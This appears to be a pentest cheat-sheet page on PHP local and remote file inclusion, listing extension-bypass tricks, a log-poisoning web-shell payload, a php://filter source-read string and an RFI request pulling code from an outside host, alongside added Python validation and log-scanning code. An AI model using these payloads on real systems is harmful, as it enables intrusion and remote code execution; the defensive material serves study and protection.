d4Rk's 1337 h4x0r guide
File inclusions (LFI, RFI)


Last updated 2 years ago

A file inclusion vulnerability is a type of web vulnerability most commonly found in web applications that rely on a scripting runtime. The issue arises when an application builds a path to executable code from an attacker-controlled variable in a way that lets the attacker choose which file is executed at runtime.


PHP settings

  • allow_url_include: must be On for include/require to load a URL (needed for RFI); Off by default since PHP 5.2.

  • allow_url_fopen: enables URL wrappers (http://, ftp://) for fopen-style functions such as file_get_contents; On by default.

String termination

Example (vulnerable include; the original snippet with its PHP syntax corrected):

include("path/" . $_GET['FILE'] . ".php");

If we want to get rid of the enforced .php extension, we must terminate the string before it. The following two ways may let you achieve exactly that.

1. Null byte poisoning

Terminate the string with a null byte: %00 (only PHP < 5.3.4; newer versions reject paths containing a null byte).

filename.txt%00

2. Query parameter

Add a query parameter.

filename.txt?bla=

The above example then becomes path/filename.txt?bla=.php; the query parameter is ignored and the file is loaded as desired. Note that this only applies when the path is fetched through a URL wrapper (for example an include over http://), where ?bla=.php is parsed as a query string; a local filesystem include treats the ? as part of the file name.
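As an added example (not code from the original page), here is the validation the include above lacks, written in Python so it can be run directly: it rejects the null byte and query-string tricks, stream wrappers and URLs via an allow-list, and checks that the resolved file stays below the base directory. The base directory /var/www/lang and the helper names are assumptions.

```python
import os
import re

# Allow-list for the user-supplied part of the include name: no '/', '?', ':'
# or '.', so wrappers (php://), URLs and '..' sequences never reach the path.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


class UnsafeIncludePath(ValueError):
    """Raised when a user-supplied include name must not be loaded."""


def resolve_include(user_value, base_dir, extension=".php"):
    """Build the same path as include("path/" . $_GET['FILE'] . ".php"),
    but refuse every input the bypasses on this page rely on."""
    # Older PHP (< 5.3.4) truncated the path at a null byte, dropping the
    # enforced extension. Reject instead of silently truncating.
    if "\x00" in user_value:
        raise UnsafeIncludePath("null byte in include name")
    # Allow-list covers 'filename.txt?bla=', 'php://filter/...', 'http://...'
    # and '../..' in one check.
    if not NAME_RE.fullmatch(user_value):
        raise UnsafeIncludePath("include name contains disallowed characters")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value + extension))
    # Defence in depth: the resolved path must still be below base_dir.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeIncludePath("include name escapes the base directory")
    return candidate


def is_safe_include(user_value, base_dir="/var/www/lang"):
    """True when resolve_include() accepts the value (assumed base directory)."""
    try:
        resolve_include(user_value, base_dir)
        return True
    except UnsafeIncludePath:
        return False
```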

Local File Inclusion (LFI)

Log file poisoning

If requests are written to a log file and you are able to make a PHP script read and interpret those logs (LFI), you may even be able to gain remote code execution (RCE).

Example

Connect to the target.

nc -nv <ip> <port>

Send a request containing some PHP, so that it gets written into the log file.

<?php echo shell_exec($_GET['cmd']); ?>

Exploit an LFI to include the log and gain RCE (here LANG is the vulnerable include parameter and cmd is read by the PHP planted in the log).

http://website.com/addguestbook.php?name=a&comment=b&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00

Read source files

Use the php://filter wrapper with base64 encoding so the included file is returned encoded instead of being executed; decode the output to retrieve the source code.

php://filter/convert.base64-encode/resource=<file>

Remote File Inclusion (RFI)

http://website.com/addguestbook.php?name=a&comment=b&LANG=http://10.11.0.5/evil.txt%00

This requires allow_url_include = On (see PHP settings above); the remote file is fetched and executed by the target.
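Added example (not from the original page) that covers the log poisoning, source disclosure and RFI requests above from the detection side: a small scanner for Apache combined-format access logs that flags null bytes, traversal into log files, php:// wrappers, remote URLs in parameters, and PHP tags planted in a request header. The log lines, host names and IP addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (Apache combined log format), not real traffic.
# Line 1 is benign; lines 2-5 mirror the request shapes discussed on this page.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /addguestbook.php?name=a&LANG=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /addguestbook.php?name=a&comment=b&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /addguestbook.php?LANG=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /addguestbook.php?LANG=http://10.11.0.5/evil.txt%00 HTTP/1.1" 200 77 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 77 "-" "<?php echo shell_exec($_GET['cmd']); ?>"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
                    r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')


def indicators(line):
    """Return the sorted list of LFI/RFI indicator names found in one log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    found = set()
    # parse_qsl decodes percent-encoding once; unquote again to see through
    # double-encoded payloads such as %252e%252e%252f.
    for _, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        v = unquote(value)
        if "\x00" in v:
            found.add("null_byte")
        if "../" in v or "..\\" in v:
            found.add("traversal")
        if re.search(r"(access|error)\.log$|/proc/self/(environ|fd/)", v.rstrip("\x00")):
            found.add("log_or_proc_include")
        if v.lower().startswith("php://"):
            found.add("php_wrapper")
        if re.match(r"(https?|ftps?|data|expect)://", v, re.I):
            found.add("remote_url")
    # Log poisoning plants PHP in a field the server copies into its log.
    if any(tag in m.group("ua") + m.group("ref") for tag in ("<?php", "<?=")):
        found.add("php_in_request_header")
    return sorted(found)


def scan(log_text):
    """Return (client_ip, indicators) for every line carrying at least one indicator."""
    return [(LOG_RE.match(l).group("ip"), indicators(l))
            for l in log_text.splitlines() if indicators(l)]


if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, ", ".join(found))
```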

See also:

  • Wikipedia
  • GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
  • PHP Sicherheit: Local & Remote File Inclusion - Webmaster Tipps
  • Directory traversal